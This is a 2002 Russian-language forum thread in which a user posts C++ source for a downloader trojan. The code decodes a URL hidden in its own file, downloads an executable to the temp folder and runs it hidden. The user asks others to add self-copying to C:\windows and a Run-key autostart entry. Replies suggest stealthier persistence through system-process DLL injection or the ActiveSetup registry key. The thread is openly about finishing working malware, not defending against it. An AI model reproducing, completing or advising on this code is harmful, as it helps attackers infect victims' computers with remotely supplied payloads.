WWW.ИСХОДНИКИ.РУ cpp.sources.ru
java.sources.ru web.sources.ru soft.sources.ru
jdbc.sources.ru asp.sources.ru api.sources.ru

  Форум на исходниках
  C / C++ / Visual C++
  Есть Исходник Download Трояна

СПРОСИТЬ  ОТВЕТИТЬ
профайл | регистрация | faq

Автор Тема:   Есть Исходник Download Трояна
Sprut опубликован 13-02-2002 22:05 MSK   Click Here to See the Profile for Sprut   Click Here to Email Sprut  
Так вот есть исходник такого трояна но там надо его доделать так чтоб он себя инсталировал C:\windows и в RUN себя прописывал...
Oboron2002@mail.ru
Muran опубликован 13-02-2002 23:39 MSK     Click Here to See the Profile for Muran  Click Here to Email Muran     
Прописывать в RUN трояна както по ламерски,
если честно. Его от туда убрать раз плюнуть.
Посадите лучше на запуск любого ехе-шника.
Это стильнее.
Sprut опубликован 14-02-2002 00:05 MSK     Click Here to See the Profile for Sprut  Click Here to Email Sprut     
Пусть по ламерски будет !!!

Muran опубликован 14-02-2002 00:27 MSK     Click Here to See the Profile for Muran  Click Here to Email Muran     
А что собственно требуется?
ADK опубликован 14-02-2002 05:34 MSK     Click Here to See the Profile for ADK  Click Here to Email ADK     
По, моему, в декабрьском "Хакере" хорошая статья про автозагрузку троянов. Авторы пришли к выводу, что нужно писать DLL, подгружающуюся к системным процессам. Подробно влом писать.
Sprut опубликован 14-02-2002 06:27 MSK     Click Here to See the Profile for Sprut  Click Here to Email Sprut     
Может исжодник хочешь глянуть так я тебе его на мыло пришлю...
Sprut опубликован 15-02-2002 15:17 MSK     Click Here to See the Profile for Sprut  Click Here to Email Sprut     
Что никто помочь не хочет и глянуть на исходник ?
Muran опубликован 15-02-2002 22:50 MSK     Click Here to See the Profile for Muran  Click Here to Email Muran     
Высылай на muran2000@hotbox.ru
Посмотрим, что можно сделать, и интересно,
что же вы нового придумали.
DEiL опубликован 16-02-2002 03:13 MSK     Click Here to See the Profile for DEiL  Click Here to Email DEiL     
ДЛЛ - отстой :)
самый хороший и доступный способ - прописаться в HKLM\SOFTWARE\Microsoft\Windows\ActiveSetup\InstalledComponents - там туева хуча уже прописанный прог (ехе и длл), причём всё это стартует раньше всего остального -)
Sprut опубликован 17-02-2002 04:06 MSK     Click Here to See the Profile for Sprut  Click Here to Email Sprut     
Вот сама часть трояна
если кому нужны все исходники кидайте на мыло

Так где сдесь нужно чего дописать чтоб он прописывал себя в реестр и копировал себя в (ну к примеру C:\windows)


#include "stdafx.h"

int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)

{
//---------get config
char myname[256];
char url[250];
GetModuleFileName(hInstance,myname,sizeof(myname)); // path 2 trojan
FILE * file=fopen(myname,"r");
fseek(file,0-sizeof(url),SEEK_END);
fread( url, sizeof(url), 1,file );
//--------------------
for(int i=0;i<sizeof(url);i++) url[i]-=5;

char tmppath[200];
GetTempPath(sizeof(tmppath),tmppath);

CString m_path=(CString)tmppath+(CString)"$temp$.exe";

try
{
CString m_url =url;
CString m_mes; // переменная в которой будут хранится сообщения
char temp[100]; // промежуточная переменная для перевода

char strBody[1024]; // буфер из 1024 байт
CInternetSession session( _T( "ZOMBIE" ), PRE_CONFIG_INTERNET_ACCESS );
CHttpConnection* pServer = NULL;
CHttpFile* pFile = NULL;

CString strServerName; // имя сервера
CString strObject; // имя объекта

INTERNET_PORT nPort; // номер порта для связи
DWORD dwServiceType; // тип сервиса
if ( AfxParseURL( m_url, dwServiceType, strServerName, strObject, nPort ) == 0 )return 1;

pServer = session.GetHttpConnection( strServerName, nPort );

pFile = pServer->OpenRequest(
CHttpConnection::HTTP_VERB_GET, strObject, NULL, 1, NULL, NULL,
INTERNET_FLAG_EXISTING_CONNECT | INTERNET_FLAG_NO_AUTO_REDIRECT
);

pFile->AddRequestHeaders( _T( "Accept: */*\r\nUser-Agent: ZOMBIES_HTTP_GET\r\n" ) );

pFile->SendRequest( );

DWORD dwRet; // переменная для хранения кода состояния
pFile->QueryInfoStatusCode( dwRet ); // записываем код состояния в dwRet

CString strHeader; // переменная для хранения полученного заголовока запроса
pFile->QueryInfo(HTTP_QUERY_RAW_HEADERS_CRLF, strHeader); // записываем заголовок в strHeader


// если код состояния не равен 200, то выходим из функции
if( dwRet != 200 ) { m_mes += "Program terminate!"; return 1; }
// ----------------------------------------------------------

CFile file2;

file2.Open((LPCTSTR)m_path,CFile::modeCreate|CFile::modeWrite|CFile::typeBinary);

int allRead = 0;
int nRead = pFile->Read( strBody, 1024 ); // считываем первые 1024 байта в буфер.
allRead += nRead; // обновляем общее число считанных байт
file2.Write( strBody, nRead );

while ( nRead > 0 )
{
nRead = pFile->Read( strBody, 1024 );

if( nRead != 0 )
{
file2.Write( strBody, nRead );
allRead += nRead;
}

}
file2.Close(); // закрываем файл
pFile->Close(); // закрываем Internet файл
pServer->Close(); // закрываем сервер
}

catch(...){}

WinExec(m_path,SW_HIDE);

return 0;
}

Sprut опубликован 18-02-2002 17:56 MSK     Click Here to See the Profile for Sprut  Click Here to Email Sprut     
Здесь есть еще живые ?
Кто нить поможет мне ?
Molibden опубликован 18-02-2002 18:31 MSK     Click Here to See the Profile for Molibden  Click Here to Email Molibden     
2Sprut. Поищи исходники hooker'а. Там именно то, что тебе нужно.
Sprut опубликован 19-02-2002 01:23 MSK     Click Here to See the Profile for Sprut  Click Here to Email Sprut     
Незнаю как еще обьяснять
понимаете я не сооборажаю в програмировании
у меня есть и Hoker и другие исходники троянов но как это оттуда выдрать и вставить я не понимаю.

СПРОСИТЬ  ОТВЕТИТЬ
Перейти:


E-mail | WWW.ИСХОДНИКИ.RU

Powered by: Ultimate Bulletin Board, Freeware Version 5.10a
Purchase our Licensed Version- which adds many more features!
© Infopop Corporation (formerly Madrona Park, Inc.), 1998 - 2000.